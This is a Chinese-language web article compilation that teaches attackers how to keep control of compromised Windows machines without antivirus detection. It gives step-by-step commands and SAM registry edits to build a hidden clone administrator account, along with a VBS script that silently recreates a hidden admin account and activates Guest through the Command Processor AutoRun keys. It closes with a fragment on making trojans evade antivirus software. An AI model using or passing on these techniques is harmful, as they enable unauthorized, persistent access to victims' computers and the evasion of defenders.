下面是小编收集整理的教你搞定不会被杀毒软件查杀的Windows后门(共含3篇),供大家参考借鉴,欢迎大家分享。同时,但愿您也能像本文投稿人“rororiri”一样,积极向本站投稿分享好文章。
在入侵目标后,通常会在目标电脑上留下后门,以便长期控制这台电脑,可是后门终归是 工具,是杀毒软件的查杀目标之一,可能杀毒软件升级后后门就被删除了。但是有一种后门是永远不会被杀毒软件查杀的,就是隐藏的系统克隆帐户。
克隆帐户是最隐蔽的后门
在Windows中(XP、Vista、Windows7等均如此),每一个帐户在注册表中都有对应的键值,这个键值影响着该帐户的权限。当 在注册表中动手脚复制键值后,就可以将一个用户权限的帐户克隆成具有管理员权限的帐户,并且将这个帐户进行隐藏。隐藏后的帐户无论是在用户管理还是命令提示符中都是不可见的。因此一般的计算机管理员很少会发现隐藏帐户,危害十分巨大。
用命令行模式添加帐户
点击开始运行,输入cmd运行命令提示符,输入如下命令:net user test$ /add并回车,这样就可以在系统中建立一个名为test$的帐户。继续输入:net localgroup administrators test$ /add并回车,这样就可以把test$帐户提升到管理员权限。
● 添加一个隐藏帐户
点击开始运行(Win7中可以在开始菜单的搜索框里面输入regedt32或者regedit),输入regedt32.exe后回车,弹出注册表编辑器,
在regedt32.exe中来到HKEY_LOCAL_MACHINE\SAM\SAM处
点击编辑菜单权限,在弹出的SAM的权限编辑窗口中选administrators帐户,在下方的权限设置处勾寻完全控制,完成后点击确定即可。
● 设置注册表操作权限
在运行中输入regedit.exe运行注册表编辑器,定位到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\AccountUsers\Names处,点击隐藏帐户test$,在右边显示的键值中的类型一项显示为0x404,向上来到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\AccountUsers处,可以找到00000404这一项,这两者是相互对应的,隐藏帐户test$的所有信息都在00000404这一项中。同样的,我们可以找到administrator帐户所对应的项为000001F4。
将test$的键值导出为test$.reg,同时将00000404和000001F4项的F键值分别导出为user.reg,admin.reg。用记事本打开admin.reg,将其中F值后面的内容复制下来,替换user.reg中的F值内容,完成后保存
● 查找隐藏帐户对应键值
在命令提示符中输入net user test$ /del命令,将我们建立的隐藏帐户删除。别紧张,这一步只是删除了隐藏帐户的空壳,就像入侵后清理痕迹一样,做好的隐藏帐户是不会发生改变的。最后,我们双击test$.reg和user.reg这两个注册表文件,将它们导入到注册表中就大功告成了。
在安全观念日益强化的今天,想得到台属于自己的肉鸡是不易的,如果说因为管理员发现了自己留在肉鸡上的后门账号而导致肉鸡丢失的话,那就是世间最痛苦的事了,相信大家都不会希望这种事情发生在自己的身上吧!这时候用什么后门来控制肉鸡就成为最让人头疼的问题,而好后门的关键就在于是否会被查杀,下文一起来看看如何打造出自己的免查杀后门吧!
Superdoor3.0这款软件大家都用过或者听过吧?它只有一个可执行程序,文件本身很小,命令简单,运行后,可以起到隐藏账号的效果,管理员在CMD下用“net user”查看
door <用户名>:<口令>
小提示:Superdoor3.0(超级后门3.0),超级用户隐藏器。
运行环境:测试通过(须VB运行库)。
运行方法:door <用户>:<密码>例:administrator:123。
功能:它在打开“计算机管理”和CMD时把用户删掉,管理员看过用户后,关闭“计算机管理”或CMD时,用户又回来了,巧妙地躲开管理员的查看,是宝鸡必备良药。
不过使用这个后门建立隐藏帐户容易,后门被发现也很容易。我使用杀毒软件(Norton Anti Virus)查了一下。在/winnt/system32/下会生成一个Cmd.exe文件和感染Conpmgmt.exe文件。
哎,看来Superdoor早就被列入杀毒名单了。而且在杀毒软件将后门程序删除后,再运行CMD命令行回在它上面多出一句:“c:\WINNT\system32\crnd.exe“不是外部或内部命令,也不是可运行的程序或批处理文件”。
看来是文件关联被动了手脚了。经过查找,发现程序写入下面两个键值:
HKEY_LOCAL_MACHINE和HKEY_CURRENT_USER\下的\Software\Microsoft\Command Processor\Auto Run
先看看这两个位置的介绍:如果/D未在命令行上被指定,当Cmd.exe运行时,它会自动寻找以下Reg_sz/reg_expand_sz注册表变量,
如果其中一个或两个都存在,这两个变量会先予执行。也就是说,只要启动了CMD就会运行上述的脚本,可以说是CMD关联吧。
达到“账号如果被撤除,运行CMD又恢复”的效果,原理就是这样的了。现在我们来根据原理做个不被杀的后门。先建立一个名字为RUN的VBS文件,保存在C:/winnt/system32/下,内容如下:
dim wsh
set wsh=CreateObject(”WScript.Shell“)
wsh.run ”net user hsmw$ qq26836659“,0
wsh.run ”net localgroup administrators hsmw$ /add“,0
wsh.run ”net user guest /active:yes“,0
wsh.run ”net user guest qq26836659“,0
wsh.run ”net localgroup administrators hsmw$ /add",0
上面一段VBS的意思就是建立个hsmw$的账号,并且加为高级管理组,设置密码为QQ26836659,激活Guest账号,并且加为高级管理组,设置密码为qq26836659。写入注册表中下面的键,关联CMD达到不死的效果:
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\Auto Run
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\Auto Run
小提示:在账号后面加入$是为了在输入“net user”时不被轻易地发现,虽然是个“不死账号”,但是在计算机管理可以轻易的查到。
一.关于免杀的来源 为了让我们的木马在各种杀毒软件的威胁下活的更久. 二.什么叫免杀和查杀 可分为二类: 1.文件免杀和查杀:不运行程序用杀毒软件进行对该程序的扫描,所得结果,
教你如何将你的木马躲过杀毒软件的查杀(制作免杀木马教程)
,
2.内存的免杀和查杀:判断的方法1运行后,用杀毒软件的内存查杀功能. 2用OD载入,
★ 七招教你搞定上司
